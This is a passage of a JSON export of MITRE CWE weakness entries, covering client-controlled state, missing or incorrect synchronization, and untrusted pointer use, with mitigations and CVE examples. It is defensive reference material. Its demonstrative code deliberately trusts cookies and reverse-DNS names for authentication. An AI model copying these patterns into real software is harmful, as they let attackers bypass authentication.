typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High","Effectiveness_Notes":"The effectiveness and speed of manual analysis will be reduced if the there is not a centralized security mechanism, and the security logic is widely distributed throughout the software."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"attr":{"@_Mitigation_ID":"MIT-4.2"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use a framework that maintains the state for you.","Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45].","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user\'s session on the server side instead of recording it within external data."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") && Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC09-J","Entry_Name":"Do not base security checks on untrusted sources"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-754"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-756"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"820":{"attr":{"@_ID":"820","@_Name":"Missing Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.","Extended_Description":"If access to a shared resource is not synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code intends to fork a process, then have both the parent and child processes print a single line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"static void print (char * string) {}int main(void) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char * word;int counter;for (word = string; counter = *word++; ) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"putc(counter, stdout);fflush(stdout);sleep(1);","xhtml:br":["","","",""],"xhtml:i":"/* Make timing window a little larger... */"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pid_t pid;pid = fork();if (pid == -1) {}else if (pid == 0) {}else {}exit(0);","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"exit(-2);","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"child\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"PARENT\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}}],"xhtml:br":["",""]}},"Body_Text":["One might expect the code to print out something like:",{"xhtml:div":{"xhtml:div":["PARENT","child"]}},"However, because the parent and child are executing concurrently, and stdout is flushed each time a character is printed, the output might be mixed together, such as:",{"xhtml:div":{"xhtml:div":["PcAhRiElNdT","[blank line]","[blank line]"]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK05-J","Entry_Name":"Synchronize access to static fields that can be modified by untrusted code"}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"821":{"attr":{"@_ID":"821","@_Name":"Incorrect Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource.","Extended_Description":"If access to a shared resource is not correctly synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"822":{"attr":{"@_ID":"822","@_Name":"Untrusted Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer.","Extended_Description":{"xhtml:p":["An attacker can supply a pointer for memory locations that the program is not expecting. If the pointer is dereferenced for a write operation, the attack might allow modification of critical program state variables, cause a crash, or execute code. If the dereferencing operation is for a read, then the attack might allow reading of sensitive data, cause a crash, or set a program variable to an unexpected value (since the value will be read from an unexpected memory location).","There are several variants of this weakness, including but not necessarily limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The untrusted value is directly invoked as a function call.","In OS kernels or drivers where there is a boundary between \\"userland\\" and privileged memory spaces, an untrusted pointer might enter through an API or system call (see CWE-781 for one such example).","Inadvertently accepting the value from an untrusted control sphere when it did not have to be accepted as input at all. This might occur when the code was originally developed to be run by a single user in a non-networked environment, and the code is then ported to or otherwise exposed to a networked environment."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5655","Description":"message-passing framework interprets values in packets as pointers, causing a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5655"},{"Reference":"CVE-2010-2299","Description":"labeled as a \\"type confusion\\" issue, also referred to as a \\"stale pointer.\\" However, the bug ID says \\"contents are simply interpreted as a pointer... renderer ordinarily doesn\'t supply this pointer directly\\". The \\"handle\\" in the untrusted area is replaced in one function, but not another - thus also, effectively, exposure to wrong sphere (CWE-668).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2299"},{"Reference":"CVE-2009-1719","Description":"Untrusted dereference using undocumented constructor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1719"},{"Reference":"CVE-2009-1250","Description":"An error code is incorrectly checked and interpreted as a pointer, leading to a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1250"},{"Reference":"CVE-2009-0311","Description":"An untrusted value is obtained from a packet and directly called as a function pointer, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0311"},{"Reference":"CVE-2010-1818","Description":"Undocumented attribute in multimedia software allows \\"unmarshaling\\" of an untrusted pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818"},{"Reference":"CVE-2010-3189","Description":"ActiveX control for security software accepts a parameter that is assumed to be an initialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189"},{"Reference":"CVE-2010-1253","Description":"Spreadsheet software treats certain record values that lead to \\"user-controlled pointer\\" (might be untrusted offset, not untrusted pointer).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"823":{"attr":{"@_ID":"823","@_Name":"Use of Out-of-range Pointer Offset","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.","Extended_Description":{"xhtml:p":["While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array.","Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error.","If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program. As a result, the attack might change the state of the software as accessed through program variables, cause a crash or instable behavior, and possibly lead to code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted pointer offset","Description":"This term is narrower than the concept of \\"out-of-range\\" offset, since the offset might be the result of a calculation or other error that does not depend on any externally-supplied values."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2160","Description":"Invalid offset in undocumented opcode leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2160"},{"Reference":"CVE-2010-1281","Description":"Multimedia player uses untrusted value from a file when using file-pointer calculations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1281"},{"Reference":"CVE-2009-3129","Description":"Spreadsheet program processes a record with an invalid size field, which is later used as an offset.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129"},{"Reference":"CVE-2009-2694","Description":"Instant messaging library does not validate an offset value specified in a packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694"},{"Reference":"CVE-2009-2687","Description":"Language interpreter does not properly handle invalid offsets in 